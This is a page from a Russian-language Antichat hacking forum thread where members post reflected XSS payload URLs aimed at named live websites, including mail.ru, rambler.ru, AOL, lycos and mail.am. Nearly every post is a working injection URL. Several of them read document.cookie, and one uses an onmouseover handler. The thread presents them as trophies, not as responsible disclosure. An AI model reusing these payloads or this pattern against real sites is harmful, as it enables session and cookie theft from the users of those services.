Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

Page 7 of 11
  1. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    http://wap.ks.korrespondent.net/search.php?keyword=><script>alert('Speciall y for the Antichat')<%2Fscript>
     
    #121 Фараон, 1 Dec 2010
    Last edited: 1 Dec 2010
    1 person likes this.
  2. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    job.gala.net
    Code:
    http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email="><script>alert('xz che za')</script>
     
    #122 ~d0s~, 6 Dec 2010
    1 person likes this.
  3. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    meta.ua
    Code:
    http://meta.ua/feeds/weather.asp?city=<script>alert(document.cookie)</script>
    Вчера там была и в поиске,не успел выложить,сегодня прихожу уже не работает,значит большая вероятность что и эту пофиксят скоро :(
     
    #123 ~d0s~, 9 Dec 2010
    1 person likes this.
  4. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    game.km.ru
    Code:
    http://game.km.ru/magazin/lenta.asp?idRubr=1&order="><script>alert('d0s')</script>&search=xD
     
    #124 ~d0s~, 12 Dec 2010
    1 person likes this.
  5. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    wap.afisha.mail.ru
    Code:
    http://wap.afisha.mail.ru/event.html/"><script>alert(document.cookie)</script>
    upd:Кто-то слил им :mad:
    На днях еще на мейле выложу несколько.
     
    #125 ~d0s~, 13 Dec 2010
    Last edited: 13 Dec 2010
    1 person likes this.
  6. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    wap.rambler.ru
    Code:
    http://wap.rambler.ru/geo/?back="><script>alert(123)</script>
     
    #126 ~d0s~, 15 Dec 2010
    1 person likes this.
  7. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    Все баги быстро закрывают из-за того, что сотрудника майла отслеживают такие темы.
     
    #127 Ruslan1817, 15 Dec 2010
    2 people like this.
  8. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    teentoday.mail.everyone.net/
    Code:
    http://teentoday.mail.everyone.net/email/scripts/loginuser.pl/"><script>alert(123)</script>
    Такого почтовика не слышал,нарыл его в листинге забугорных почтовиков мейла,если что-то не то удалите :)
     
    #128 ~d0s~, 18 Dec 2010
  9. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    XSS рабочая и в рабочем виде, а вот если догадаетесь почему она у вас не заработала или заработала, то вы хэккеры))))

     
    _________________________
    #129 Uex Urgent, 19 Dec 2010
    4 people like this.
  10. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    http://my-mail.co.il
    Code:
    http://my-mail.co.il/wm/mail/login2.html?user="><script>alert('XSS')</script>
     
    #130 eclipse, 20 Dec 2010
    Last edited: 20 Dec 2010
    2 people like this.
  11. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    mail2000.ru
    Code:
    http://mail2000.ru/ya.php?query="><script>alert(document.cookie)</script>
     
    #131 ~d0s~, 21 Dec 2010
    1 person likes this.
  12. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Code:
    [B]http://www.virtualjerusalem.com[/B]/news.php?Itemid="><script>alert(/xss/)</script>
     
    #132 eclipse, 22 Dec 2010
    Last edited: 22 Dec 2010
    1 person likes this.
  13. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    smallbusiness.aol.com
    Code:
    http://smallbusiness.aol.com/search/?q=<script>alert(document.cookie)</script>
     
    #133 ~d0s~, 23 Dec 2010
    1 person likes this.
  14. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    lycos.com

    Code:
    https://registration.lycos.com/forgot.php/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
    mail.infobox.ru
    Code:
    http://mail.infobox.ru/redirect.php?login_username="><script>alert(/xss/)</script>&secretkey="><script>alert(/xss/)</script>&js_autodetect_results=1&just_logged_in=1&lng=ru_RU&lng=ru_RU
     
    #134 eclipse, 24 Dec 2010
    Last edited: 24 Dec 2010
    2 people like this.
  15. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    music.aol.com
    Code:
    http://music.aol.com/pictures/search/?cat=photo&query=<script>alert(document.cookie)</script>
     
    #135 ~d0s~, 26 Dec 2010
    Last edited: 26 Dec 2010
    1 person likes this.
  16. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    xakep.ru
    Code:
    http://xakep.ru/local/search/result.asp?tosearch=</title><script>alert(document.cookie)</script>
     
    #136 ~d0s~, 16 Jan 2011
    8 people like this.
  17. NemTaq

    NemTaq Member

    Joined:
    11 Aug 2010
    Messages:
    115
    Likes Received:
    19
    Reputations:
    14
    aboutmail.ru

    http://www.aboutmail.ru/?option=com_performs&formid=1

    уязвимые поля:
    Ваше имя: *
    Ваш EMail: *
    Заголовок: *

    //добавь пример.
     
    #137 NemTaq, 17 Jan 2011
    Last edited by a moderator: 18 Jan 2011
    2 people like this.
  18. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    не почтовый сервис, но XSS няшка :rolleyes:

     
    _________________________
    #138 Uex Urgent, 22 Apr 2011
    1 person likes this.
  19. Sevak

    Sevak New Member

    Joined:
    14 Dec 2010
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    Mail.am: PR - 4


    Code:
    http://realty.mail.am/index.php?page=view_2&tp_tp=\%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E&return=0&realty
     
    #139 Sevak, 26 Apr 2011
  20. Sevak

    Sevak New Member

    Joined:
    14 Dec 2010
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    Mail.ru

    Mail.ru​



    Code:
    http://zhuki.mail.ru/?register=2&form[nick]=%27onmouseover=%27alert%28/xss/%29;%27%20name=%272
    Code:
    после перехода на ссылку, наведите мышуку на радиокнопку
     
    #140 Sevak, 30 Apr 2011
    Last edited: 30 Apr 2011
    2 people like this.
(You must log in or sign up to post here.)
Page 7 of 11
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.